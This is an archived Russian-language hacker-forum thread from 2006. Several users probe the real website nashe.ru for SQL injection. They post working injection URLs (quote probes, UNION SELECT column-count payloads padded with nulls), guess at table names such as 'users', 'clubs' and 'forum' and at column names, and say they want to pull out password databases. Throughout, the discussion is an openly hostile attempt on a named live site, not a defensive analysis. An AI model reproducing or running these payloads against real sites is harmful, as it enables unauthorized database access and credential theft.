PDA

Просмотр полной версии : www.nashe.ru (SQL)

gannibal
27.02.2006, 17:19
http://www.nashe.ru/data/past/past_detail.php3?id=1'
http://www.nashe.ru/data/artists/art_detail.php3?id=1'

ну и там их куча еще..........

вообще че-нить можно замутить с этим?
gadjet
27.02.2006, 20:18
Тута скуль инъекция
http://www.nashe.ru/data/past/past_detail.php3?id=99999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,null--
но, кажись, ниче не выдет. Ругается типа:
UNION types "text" and "int4" not matched . А так - раскрытие пути. Там просто postgeSQL, а с ним я не дружу;)))
gannibal
27.02.2006, 20:49
мне кажется надо просто грамотно запрос составить и тогда все будет!
gadjet
27.02.2006, 20:54
Составь, тока мне привычнее иметь дело с MySQL или MSSQL, на крайний случай.
Rebz
27.02.2006, 22:19
эх, ребятки.. находил я уже это.. и таблицы подбирал))
ток толку не было..) там даже для форума нет базы юзеров).
gadjet
27.02.2006, 23:32
To Rebz Какую ты конструкцию использовал? А тож интересно, как там построить синтаксически правильную конструкцию.
Rebz
27.02.2006, 23:47
ща поищу.. ток мои запросы обычные.. =) не аткие уж идеальные -)
подобрал атрибуты _http://www.nashe.ru/data/clubs/club_detail.php3?id=66%20union%20select%20
null,null,null,null,null,null,null%20from%20clubs--

_http://www.nashe.ru/data/clubs/club_detail.php3?id=66%20union%20select%20
null,null,null,null,null,null,null%20from%20users--

полносью подобраны атрибуты:
_http://www.nashe.ru/data/dj/dj_detail.php3?id=34%20union%20select%20
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,
null,null%20from%20users--

select users,null - дает интересную ошибку.. атрибут users
Кажется сущестуют такие названия как usr_id,usr_name

таблица forum есть..

В общем, это всё что удалось раскопать.. да и уже неитнересно стало)
gannibal
28.02.2006, 02:41
ссылки которые я привел с SQl на сайте, если правильно составить запрос то что в итоге должно примерно выдавать?
Rebz
28.02.2006, 12:33
ошибку MySQL должно выдать..

если ты подберешь названия столбцов (атрибутов) и самих таблиц, то можно полезные вещи вытащить.. если бы базы паролей были там..) можно было их бы вытащить)
gadjet
28.02.2006, 18:38
ошибку MySQL должно выдать..
Там стоит PostgreSQL
Rebz
28.02.2006, 19:41
да, точно.. ошибся. Конечно же PostgreSQL